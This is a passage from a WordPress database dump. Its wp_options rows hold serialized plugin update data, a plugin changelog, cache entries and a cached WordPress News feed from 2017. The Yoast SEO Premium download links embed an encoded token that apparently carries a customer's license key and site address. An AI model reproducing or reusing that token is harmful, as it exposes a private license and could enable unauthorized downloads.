#000000;"> with adding custom fields on single enquiry form.</span></li>\n<li style="color: #000000;">Problem<span style="color: #000000;"> with adding custom fields on multiple enquiry </span>form<span style="color: #000000;">.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Removed minimum 15 characters message validation on enquiry form.</span></li>\n</ul>\n<p><span style="color: #000000;">3.1.0</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;">Hover feature added.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Enquiry time issue on enquiry details page.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Issue when we change products sale price.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Issue when changing product image.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Message validation on enquiry form.</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Warnings and notices on plugin activation.</span></li>\n<li style="color: #000000;"><span style="color: #000000;"> Issue with product </span>url<span style="color: #000000;"> not sent in the email</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Issue with </span>sku<span style="color: #000000;"> not sent in the email</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Issue with enquiry button on archive pages</span></li>\n</ul>\n<p><span style="color: #000000;">3.0.1</span></p>\n<ul>\n<li style="color: #000000;">Issue<span style="color: #000000;"> with plugin update fixed.</span></li>\n</ul>\n<p><span style="color: #000000;">3.0.0</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;">Feature for multi-product enquiry</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Option for admin to reply to </span>enquiry<span style="color: #000000;"> from </span>dashboard<span style="color: #000000;">.</span></li>\n</ul>\n<p><span style="color: #000000;">2.2.1</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;">Fixed warnings and redirect issues with the last update</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Compatible with WordPress 4.3.1 and WooCommerce 2.4.10</span></li>\n</ul>\n<p><span style="color: #000000;">2.2.0</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;">Enquiry button on shop archive page</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Option to apply global settings for all products</span></li>\n</ul>\n<p><span style="color: #000000;">2.1.4</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;">Resolved the issue with the Add to cart button being displayed twice</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Feature to select the county for telephone number field validation added</span></li>\n<li style="color: #000000;"><span style="color: #000000;">Compatible with WooCommerce 2.4.6 and WordPress 4.3</span></li>\n</ul>\n<p><span style="color: #000000;"> </span><br />\n<span style="color: #000000;">2.1.3</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;">Feature to make the telephone number field mandatory</span></li>\n</ul>\n<p><span style="color: #000000;">2.1.2</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;"><strong> </strong>Plugin license code updated</span></li>\n</ul>\n<p><span style="color: #000000;">2.1.1</span></p>\n<ul>\n<li style="color: #000000;"><span style="color: #000000;"><strong> </strong>Added feature to redirect user on submitting the enquiry</span></li>\n</ul>\n<p><span style="color: #000000;">2.1</span></p>\n<ul style="color: #000000;">\n<li><span style="color: #000000;">Added feature to enable/disable add to cart button</span></li>\n<li><span style="color: #000000;">Form field accepts the name of the user making the enquiry</span></li>\n<li><span style="color: #000000;">Compatible with WooCommerce 2.3.7</span></li>\n</ul>\n<p><span style="color: #000000;">2.0</span></p>\n<ul style="color: #000000;">\n<li><span style="color: #000000;">Added filters to allow users to customise enquiry form.</span></li>\n<li><span style="color: #000000;">Added functionality to display additional fields in enquiry table.</span></li>\n<li><span style="color: #000000;">Added German language files.</span></li>\n<li><span style="color: #000000;">Added Dutch language files.</span></li>\n</ul>\n<p><span style="color: #000000;"> </span><br />\n<span style="color: #000000;">1.4.0</span></p>\n<ul style="color: #000000;">\n<li><span style="color: #000000;">Feature to add multiple recipient email addresses.</span></li>\n<li><span style="color: #000000;">Display Enquiry button only when </span>product<span style="color: #000000;"> is out of stock.</span></li>\n<li><span style="color: #000000;">Added Swedish language files.</span></li>\n<li><span style="color: #000000;">Fixed warnings.</span></li>\n</ul>\n<p><span style="color: #000000;">1.3.1</span></p>\n<ul style="color: #000000;">\n<li><span style="color: #000000;">Settings provided to add Enquiry Button to selected products.</span></li>\n<li><span style="color: #000000;">Added Blog\'s Name in the Subject of emails that are sent out.</span></li>\n<li><span style="color: #000000;">Many Hooks and Filters have been added. Developers can now add their own hidden field on the form.</span></li>\n<li><span style="color: #000000;">Added SKU Field in the form.</span></li>\n<li><span style="color: #000000;">CSS Box on </span>Settings<span style="color: #000000;"> page to add custom CSS.</span></li>\n<li><span style="color: #000000;">If WPML is enabled, then sends out </span>email<span style="color: #000000;"> to Admin and Author in the language they have set in their profile.</span></li>\n<li><span style="color: #000000;">If WPML is enabled, then sends out </span>email<span style="color: #000000;"> to customers in the language they are viewing the website.</span></li>\n</ul>\n<p><span style="color: #000000;">1.3.0</span></p>\n<ul style="color: #000000;">\n<li><span style="color: #000000;">Provided checkbox to replace enquiry button with link</span></li>\n<li><span style="color: #000000;">reply-to address changed to </span>senders<span style="color: #000000;"> address</span></li>\n</ul>\n<p><span style="color: #000000;">1.2.1</span></p>\n<ul style="color: #000000;">\n<li><span style="color: #000000;">Fixed Warnings</span></li>\n<li><span style="color: #000000;">Fixed Enquiry Modal issue for fixed header themes</span></li>\n</ul>\n<p><span style="color: #000000;">1.2.0</span></p>\n<ul style="color: #000000;">\n<li><span style="color: #000000;">Fixed Enquiry Modal issue</span></li>\n<li><span style="color: #000000;">Increased Enquiry Message Length</span></li>\n</ul>\n<p><span style="color: #000000;">1.1</span></p>\n<ul style="color: #000000;">\n<li><span style="color: #000000;">Updated Strings on Product Enquiry </span>Dialog</li>\n<li><span style="color: #000000;">Changed text of Post Enquiry message</span></li>\n</ul>\n<p><span style="color: #000000;">1.0</span></p>\n<ul style="color: #000000;">\n<li><span style="color: #000000;">Plugin Released</span></li>\n</ul>\n";}s:7:"banners";s:41:"a:2:{s:4:"high";s:0:"";s:3:"low";s:0:"";}";}s:40:"wordpress-seo-premium/wp-seo-premium.php";O:8:"stdClass":9:{s:11:"new_version";s:5:"5.3.1";s:4:"name";s:31:"Yoast SEO for WordPress Premium";s:4:"slug";s:21:"wordpress-seo-premium";s:3:"url";s:69:"https://my.yoast.com/?download=wordpress-seo-premium&#038;changelog=1";s:12:"last_updated";s:19:"2017-08-22 12:53:50";s:8:"homepage";s:52:"https://my.yoast.com/?download=wordpress-seo-premium";s:7:"package";s:200:"http://my.yoast.com/edd-sl/package_download/MTUwODU5MTU2MzphYWU3NGI5M2I4YTVkNWU4NDFmZWQ0NDc1NGUwZjJhODoxMDUyNDM6MDFlZWI1MTA4YWU5NzM0NzVlNjg5MjVmNzkyZTdmZjc6aHR0cHNALy93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29t";s:13:"download_link";s:200:"http://my.yoast.com/edd-sl/package_download/MTUwODU5MTU2MzphYWU3NGI5M2I4YTVkNWU4NDFmZWQ0NDc1NGUwZjJhODoxMDUyNDM6MDFlZWI1MTA4YWU5NzM0NzVlNjg5MjVmNzkyZTdmZjc6aHR0cHNALy93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29t";s:8:"sections";a:2:{s:11:"description";s:53:"<p>The premium version of the Yoast SEO plugin.</p>\n";s:9:"changelog";s:586:"<p>5.3.1<br />\nAugust 22nd, 2017</p>\n<ul>\n<li>Includes every change in Yoast SEO core 5.3.1, see the <a href="https://wordpress.org/plugins/wordpress-seo/changelog/">core changelog</a>.</li>\n</ul>\n<p>5.3.0<br />\nAugust 22nd, 2017</p>\n<ul>\n<li>Add feature to export redirects, via SEO - Tools - Import/Export</li>\n<li>Removes the DC.date.issued meta tag</li>\n<li>When creating a redirect to a file, it will no longer show a warning that the target location does not exist</li>\n</ul>\n<p><a href="https://my.yoast.com/wordpress/plugins/seo/change-log/">See the full changelog here</a></p>\n";}}}s:12:"translations";a:0:{}s:9:"no_update";a:27:{s:21:"articles/articles.php";O:8:"stdClass":6:{s:2:"id";s:22:"w.org/plugins/articles";s:4:"slug";s:8:"articles";s:6:"plugin";s:21:"articles/articles.php";s:11:"new_version";s:3:"1.3";s:3:"url";s:39:"https://wordpress.org/plugins/articles/";s:7:"package";s:55:"https://downloads.wordpress.org/plugin/articles.1.3.zip";}s:25:"bwp-minify/bwp-minify.php";O:8:"stdClass":6:{s:2:"id";s:24:"w.org/plugins/bwp-minify";s:4:"slug";s:10:"bwp-minify";s:6:"plugin";s:25:"bwp-minify/bwp-minify.php";s:11:"new_version";s:5:"1.3.3";s:3:"url";s:41:"https://wordpress.org/plugins/bwp-minify/";s:7:"package";s:59:"https://downloads.wordpress.org/plugin/bwp-minify.1.3.3.zip";}s:27:"check-email/check-email.php";O:8:"stdClass":6:{s:2:"id";s:25:"w.org/plugins/check-email";s:4:"slug";s:11:"check-email";s:6:"plugin";s:27:"check-email/check-email.php";s:11:"new_version";s:5:"0.5.5";s:3:"url";s:42:"https://wordpress.org/plugins/check-email/";s:7:"package";s:54:"https://downloads.wordpress.org/plugin/check-email.zip";}s:36:"contact-form-7/wp-contact-form-7.php";O:8:"stdClass":8:{s:2:"id";s:28:"w.org/plugins/contact-form-7";s:4:"slug";s:14:"contact-form-7";s:6:"plugin";s:36:"contact-form-7/wp-contact-form-7.php";s:11:"new_version";s:3:"4.9";s:3:"url";s:45:"https://wordpress.org/plugins/contact-form-7/";s:7:"package";s:61:"https://downloads.wordpress.org/plugin/contact-form-7.4.9.zip";s:6:"tested";s:5:"4.8.1";s:13:"compatibility";a:0:{}}s:38:"sidecar-decision-tree/DecisionTree.php";O:8:"stdClass":6:{s:2:"id";s:35:"w.org/plugins/sidecar-decision-tree";s:4:"slug";s:21:"sidecar-decision-tree";s:6:"plugin";s:38:"sidecar-decision-tree/DecisionTree.php";s:11:"new_version";s:3:"1.1";s:3:"url";s:52:"https://wordpress.org/plugins/sidecar-decision-tree/";s:7:"package";s:68:"https://downloads.wordpress.org/plugin/sidecar-decision-tree.1.1.zip";}s:59:"disable-woocommerce-reviews/disable-woocommerce-reviews.php";O:8:"stdClass":6:{s:2:"id";s:41:"w.org/plugins/disable-woocommerce-reviews";s:4:"slug";s:27:"disable-woocommerce-reviews";s:6:"plugin";s:59:"disable-woocommerce-reviews/disable-woocommerce-reviews.php";s:11:"new_version";s:3:"1.1";s:3:"url";s:58:"https://wordpress.org/plugins/disable-woocommerce-reviews/";s:7:"package";s:70:"https://downloads.wordpress.org/plugin/disable-woocommerce-reviews.zip";}s:88:"disclaimer-and-notification-manager-for-authors/disclaimer-manager-multi-author-blog.php";O:8:"stdClass":6:{s:2:"id";s:61:"w.org/plugins/disclaimer-and-notification-manager-for-authors";s:4:"slug";s:47:"disclaimer-and-notification-manager-for-authors";s:6:"plugin";s:88:"disclaimer-and-notification-manager-for-authors/disclaimer-manager-multi-author-blog.php";s:11:"new_version";s:5:"1.0.2";s:3:"url";s:78:"https://wordpress.org/plugins/disclaimer-and-notification-manager-for-authors/";s:7:"package";s:96:"https://downloads.wordpress.org/plugin/disclaimer-and-notification-manager-for-authors.1.0.2.zip";}s:39:"easy-google-fonts/easy-google-fonts.php";O:8:"stdClass":8:{s:2:"id";s:31:"w.org/plugins/easy-google-fonts";s:4:"slug";s:17:"easy-google-fonts";s:6:"plugin";s:39:"easy-google-fonts/easy-google-fonts.php";s:11:"new_version";s:5:"1.4.3";s:3:"url";s:48:"https://wordpress.org/plugins/easy-google-fonts/";s:7:"package";s:60:"https://downloads.wordpress.org/plugin/easy-google-fonts.zip";s:6:"tested";s:3:"4.8";s:13:"compatibility";a:0:{}}s:48:"wp-live-chat-software-for-wordpress/livechat.php";O:8:"stdClass":6:{s:2:"id";s:49:"w.org/plugins/wp-live-chat-software-for-wordpress";s:4:"slug";s:35:"wp-live-chat-software-for-wordpress";s:6:"plugin";s:48:"wp-live-chat-software-for-wordpress/livechat.php";s:11:"new_version";s:5:"3.3.1";s:3:"url";s:66:"https://wordpress.org/plugins/wp-live-chat-software-for-wordpress/";s:7:"package";s:84:"https://downloads.wordpress.org/plugin/wp-live-chat-software-for-wordpress.3.3.3.zip";}s:49:"nextend-google-connect/nextend-google-connect.php";O:8:"stdClass":6:{s:2:"id";s:36:"w.org/plugins/nextend-google-connect";s:4:"slug";s:22:"nextend-google-connect";s:6:"plugin";s:49:"nextend-google-connect/nextend-google-connect.php";s:11:"new_version";s:5:"1.6.1";s:3:"url";s:53:"https://wordpress.org/plugins/nextend-google-connect/";s:7:"package";s:71:"https://downloads.wordpress.org/plugin/nextend-google-connect.1.6.1.zip";}s:27:"ninja-forms/ninja-forms.php";O:8:"stdClass":6:{s:2:"id";s:25:"w.org/plugins/ninja-forms";s:4:"slug";s:11:"ninja-forms";s:6:"plugin";s:27:"ninja-forms/ninja-forms.php";s:11:"new_version";s:5:"3.1.9";s:3:"url";s:42:"https://wordpress.org/plugins/ninja-forms/";s:7:"package";s:60:"https://downloads.wordpress.org/plugin/ninja-forms.3.1.9.zip";}s:27:"p3-profiler/p3-profiler.php";O:8:"stdClass":6:{s:2:"id";s:25:"w.org/plugins/p3-profiler";s:4:"slug";s:11:"p3-profiler";s:6:"plugin";s:27:"p3-profiler/p3-profiler.php";s:11:"new_version";s:7:"1.5.3.9";s:3:"url";s:42:"https://wordpress.org/plugins/p3-profiler/";s:7:"package";s:62:"https://downloads.wordpress.org/plugin/p3-profiler.1.5.3.9.zip";}s:71:"password-strength-for-woocommerce/password-strength-for-woocommerce.php";O:8:"stdClass":6:{s:2:"id";s:47:"w.org/plugins/password-strength-for-woocommerce";s:4:"slug";s:33:"password-strength-for-woocommerce";s:6:"plugin";s:71:"password-strength-for-woocommerce/password-strength-for-woocommerce.php";s:11:"new_version";s:5:"1.0.1";s:3:"url";s:64:"https://wordpress.org/plugins/password-strength-for-woocommerce/";s:7:"package";s:82:"https://downloads.wordpress.org/plugin/password-strength-for-woocommerce.1.0.1.zip";}s:47:"regenerate-thumbnails/regenerate-thumbnails.php";O:8:"stdClass":6:{s:2:"id";s:35:"w.org/plugins/regenerate-thumbnails";s:4:"slug";s:21:"regenerate-thumbnails";s:6:"plugin";s:47:"regenerate-thumbnails/regenerate-thumbnails.php";s:11:"new_version";s:5:"2.2.6";s:3:"url";s:52:"https://wordpress.org/plugins/regenerate-thumbnails/";s:7:"package";s:64:"https://downloads.wordpress.org/plugin/regenerate-thumbnails.zip";}s:17:"schema/schema.php";O:8:"stdClass":6:{s:2:"id";s:20:"w.org/plugins/schema";s:4:"slug";s:6:"schema";s:6:"plugin";s:17:"schema/schema.php";s:11:"new_version";s:5:"1.6.6";s:3:"url";s:37:"https://wordpress.org/plugins/schema/";s:7:"package";s:49:"https://downloads.wordpress.org/plugin/schema.zip";}s:37:"show-hide-author/show_hide_author.php";O:8:"stdClass":6:{s:2:"id";s:30:"w.org/plugins/show-hide-author";s:4:"slug";s:16:"show-hide-author";s:6:"plugin";s:37:"show-hide-author/show_hide_author.php";s:11:"new_version";s:3:"2.3";s:3:"url";s:47:"https://wordpress.org/plugins/show-hide-author/";s:7:"package";s:59:"https://downloads.wordpress.org/plugin/show-hide-author.zip";}s:20:"smtp-mailer/main.php";O:8:"stdClass":8:{s:2:"id";s:25:"w.org/plugins/smtp-mailer";s:4:"slug";s:11:"smtp-mailer";s:6:"plugin";s:20:"smtp-mailer/main.php";s:11:"new_version";s:5:"1.0.3";s:3:"url";s:42:"https://wordpress.org/plugins/smtp-mailer/";s:7:"package";s:54:"https://downloads.wordpress.org/plugin/smtp-mailer.zip";s:6:"tested";s:3:"4.8";s:13:"compatibility";a:0:{}}s:27:"table-maker/table-maker.php";O:8:"stdClass":6:{s:2:"id";s:25:"w.org/plugins/table-maker";s:4:"slug";s:11:"table-maker";s:6:"plugin";s:27:"table-maker/table-maker.php";s:11:"new_version";s:3:"1.6";s:3:"url";s:42:"https://wordpress.org/plugins/table-maker/";s:7:"package";s:58:"https://downloads.wordpress.org/plugin/table-maker.1.6.zip";}s:27:"updraftplus/updraftplus.php";O:8:"stdClass":6:{s:2:"id";s:25:"w.org/plugins/updraftplus";s:4:"slug";s:11:"updraftplus";s:6:"plugin";s:27:"updraftplus/updraftplus.php";s:11:"new_version";s:6:"1.13.5";s:3:"url";s:42:"https://wordpress.org/plugins/updraftplus/";s:7:"package";s:61:"https://downloads.wordpress.org/plugin/updraftplus.1.13.5.zip";}s:55:"url-builder-for-analytics/url-builder-for-analytics.php";O:8:"stdClass":6:{s:2:"id";s:39:"w.org/plugins/url-builder-for-analytics";s:4:"slug";s:25:"url-builder-for-analytics";s:6:"plugin";s:55:"url-builder-for-analytics/url-builder-for-analytics.php";s:11:"new_version";s:5:"1.1.2";s:3:"url";s:56:"https://wordpress.org/plugins/url-builder-for-analytics/";s:7:"package";s:74:"https://downloads.wordpress.org/plugin/url-builder-for-analytics.1.1.2.zip";}s:47:"user-specific-content/User-Specific-Content.php";O:8:"stdClass":6:{s:2:"id";s:35:"w.org/plugins/user-specific-content";s:4:"slug";s:21:"user-specific-content";s:6:"plugin";s:47:"user-specific-content/User-Specific-Content.php";s:11:"new_version";s:5:"1.0.6";s:3:"url";s:52:"https://wordpress.org/plugins/user-specific-content/";s:7:"package";s:70:"https://downloads.wordpress.org/plugin/user-specific-content.1.0.6.zip";}s:59:"woocommerce-category-banner/woocommerce-category-banner.php";O:8:"stdClass":6:{s:2:"id";s:41:"w.org/plugins/woocommerce-category-banner";s:4:"slug";s:27:"woocommerce-category-banner";s:6:"plugin";s:59:"woocommerce-category-banner/woocommerce-category-banner.php";s:11:"new_version";s:5:"1.1.2";s:3:"url";s:58:"https://wordpress.org/plugins/woocommerce-category-banner/";s:7:"package";s:76:"https://downloads.wordpress.org/plugin/woocommerce-category-banner.1.1.2.zip";}s:27:"woosidebars/woosidebars.php";O:8:"stdClass":6:{s:2:"id";s:25:"w.org/plugins/woosidebars";s:4:"slug";s:11:"woosidebars";s:6:"plugin";s:27:"woosidebars/woosidebars.php";s:11:"new_version";s:5:"1.4.3";s:3:"url";s:42:"https://wordpress.org/plugins/woosidebars/";s:7:"package";s:60:"https://downloads.wordpress.org/plugin/woosidebars.1.4.3.zip";}s:33:"wordpress-move/wordpress-move.php";O:8:"stdClass":6:{s:2:"id";s:28:"w.org/plugins/wordpress-move";s:4:"slug";s:14:"wordpress-move";s:6:"plugin";s:33:"wordpress-move/wordpress-move.php";s:11:"new_version";s:5:"1.3.2";s:3:"url";s:45:"https://wordpress.org/plugins/wordpress-move/";s:7:"package";s:63:"https://downloads.wordpress.org/plugin/wordpress-move.1.3.2.zip";}s:29:"wp-mail-smtp/wp_mail_smtp.php";O:8:"stdClass":6:{s:2:"id";s:26:"w.org/plugins/wp-mail-smtp";s:4:"slug";s:12:"wp-mail-smtp";s:6:"plugin";s:29:"wp-mail-smtp/wp_mail_smtp.php";s:11:"new_version";s:6:"0.10.1";s:3:"url";s:43:"https://wordpress.org/plugins/wp-mail-smtp/";s:7:"package";s:62:"https://downloads.wordpress.org/plugin/wp-mail-smtp.0.10.1.zip";}s:43:"wp-instagram-widget/wp-instagram-widget.php";O:8:"stdClass":6:{s:2:"id";s:33:"w.org/plugins/wp-instagram-widget";s:4:"slug";s:19:"wp-instagram-widget";s:6:"plugin";s:43:"wp-instagram-widget/wp-instagram-widget.php";s:11:"new_version";s:5:"1.9.8";s:3:"url";s:50:"https://wordpress.org/plugins/wp-instagram-widget/";s:7:"package";s:62:"https://downloads.wordpress.org/plugin/wp-instagram-widget.zip";}s:47:"wp-simple-mail-sender/wp-simple-mail-sender.php";O:8:"stdClass":6:{s:2:"id";s:35:"w.org/plugins/wp-simple-mail-sender";s:4:"slug";s:21:"wp-simple-mail-sender";s:6:"plugin";s:47:"wp-simple-mail-sender/wp-simple-mail-sender.php";s:11:"new_version";s:5:"1.0.2";s:3:"url";s:52:"https://wordpress.org/plugins/wp-simple-mail-sender/";s:7:"package";s:70:"https://downloads.wordpress.org/plugin/wp-simple-mail-sender.1.0.2.zip";}}}', 'no'); 
INSERT INTO `wp_options` VALUES (693166, '_transient_timeout_nf_form_19', '1503494291', 'no'); 
INSERT INTO `wp_options` VALUES (693167, '_transient_nf_form_19', 'O:7:"NF_Form":5:{s:7:"form_id";i:19;s:8:"settings";a:5:{s:12:"date_updated";s:10:"2017-08-21";s:14:"clear_complete";s:1:"1";s:13:"hide_complete";s:1:"1";s:10:"show_title";s:1:"0";s:6:"status";s:3:"new";}s:6:"fields";a:0:{}s:10:"field_keys";a:0:{}s:6:"errors";a:0:{}}', 'no'); 
INSERT INTO `wp_options` VALUES (693195, '_transient_timeout_wc_admin_report', '1503497050', 'no'); 
INSERT INTO `wp_options` VALUES (693196, '_transient_wc_admin_report', 'a:1:{s:32:"3cff5a438852458aea233dc33646643b";a:0:{}}', 'no'); 
INSERT INTO `wp_options` VALUES (693197, '_transient_timeout_wc_low_stock_count', '1506002650', 'no'); 
INSERT INTO `wp_options` VALUES (693198, '_transient_wc_low_stock_count', '0', 'no'); 
INSERT INTO `wp_options` VALUES (693199, '_transient_timeout_wc_outofstock_count', '1506002650', 'no'); 
INSERT INTO `wp_options` VALUES (693200, '_transient_wc_outofstock_count', '0', 'no'); 
INSERT INTO `wp_options` VALUES (693201, '_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1503453855', 'no'); 
INSERT INTO `wp_options` VALUES (693202, '_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:49:"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:14:"WordPress News";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:26:"https://wordpress.org/news";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:14:"WordPress News";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:13:"lastBuildDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 21 Aug 2017 12:09:06 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:5:"en-US";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"generator";a:1:{i:0;a:5:{s:4:"data";s:40:"https://wordpress.org/?v=4.9-alpha-41268";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:10:{i:0;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:35:"WordPress 4.8.1 Maintenance Release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:71:"https://wordpress.org/news/2017/08/wordpress-4-8-1-maintenance-release/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 02 Aug 2017 21:26:25 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4875";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:366:"After over 13 million downloads of WordPress 4.8, we are pleased to announce the immediate availability of WordPress 4.8.1, a maintenance release. This release contains 29 maintenance fixes and enhancements, chief among them are fixes to the rich Text widget and the introduction of the Custom HTML widget. For a full list of changes, consult the release [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:12:"Weston Ruter";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2560:"<p>After over 13 million downloads of WordPress 4.8, we are pleased to announce the immediate availability of WordPress 4.8.1, a maintenance release.</p>\n<p>This release contains 29 maintenance fixes and enhancements, chief among them are fixes to the rich Text widget and the introduction of the Custom HTML widget. For a full list of changes, consult the <a href="https://codex.wordpress.org/Version_4.8.1">release notes</a>, the <a href="https://core.trac.wordpress.org/query?status=closed&amp;milestone=4.8.1&amp;group=component">tickets closed</a>, and the <a href="https://core.trac.wordpress.org/log/branches/4.8?rev=41210&amp;stop_rev=40891">list of changes</a>.</p>\n<p><a href="https://wordpress.org/download/">Download WordPress 4.8.1</a> or visit <strong>Dashboard → Updates</strong> and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.8.1.</p>\n<p>Thanks to everyone who contributed to 4.8.1:<br />\n<a href="https://profiles.wordpress.org/adamsilverstein/">Adam Silverstein</a>, <a href="https://profiles.wordpress.org/afercia/">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/azaozz/">Andrew Ozz</a>, <a href="https://profiles.wordpress.org/atanasangelovdev/">Atanas Angelov</a>, <a href="https://profiles.wordpress.org/gitlost/">bonger</a>, <a href="https://profiles.wordpress.org/boonebgorges/">Boone Gorges</a>, <a href="https://profiles.wordpress.org/bor0/">Boro Sitnikovski</a>, <a href="https://profiles.wordpress.org/dlh/">David Herrera</a>, <a href="https://profiles.wordpress.org/jnylen0/">James Nylen</a>, <a href="https://profiles.wordpress.org/jbpaul17/">Jeffrey Paul</a>, <a href="https://profiles.wordpress.org/jmdodd/">Jennifer M. Dodd</a>, <a href="https://profiles.wordpress.org/kadamwhite/">K. Adam White</a>, <a href="https://profiles.wordpress.org/obenland/">Konstantin Obenland</a>, <a href="https://profiles.wordpress.org/melchoyce/">Mel Choyce</a>, <a href="https://profiles.wordpress.org/r-a-y/">r-a-y</a>, <a href="https://profiles.wordpress.org/greuben/">Reuben Gunday</a>, <a href="https://profiles.wordpress.org/rinkuyadav999/">Rinku Y</a>, <a href="https://profiles.wordpress.org/sa3idho/">Said El Bakkali</a>, <a href="https://profiles.wordpress.org/sergeybiryukov/">Sergey Biryukov</a>, <a href="https://profiles.wordpress.org/nomnom99/">Siddharth Thevaril</a>, <a href="https://profiles.wordpress.org/timmydcrawford/">Timmy Crawford</a>, and <a href="https://profiles.wordpress.org/westonruter/">Weston Ruter</a>.</p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4875";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:33:"The Month in WordPress: July 2017";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:68:"https://wordpress.org/news/2017/08/the-month-in-wordpress-july-2017/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 02 Aug 2017 07:50:14 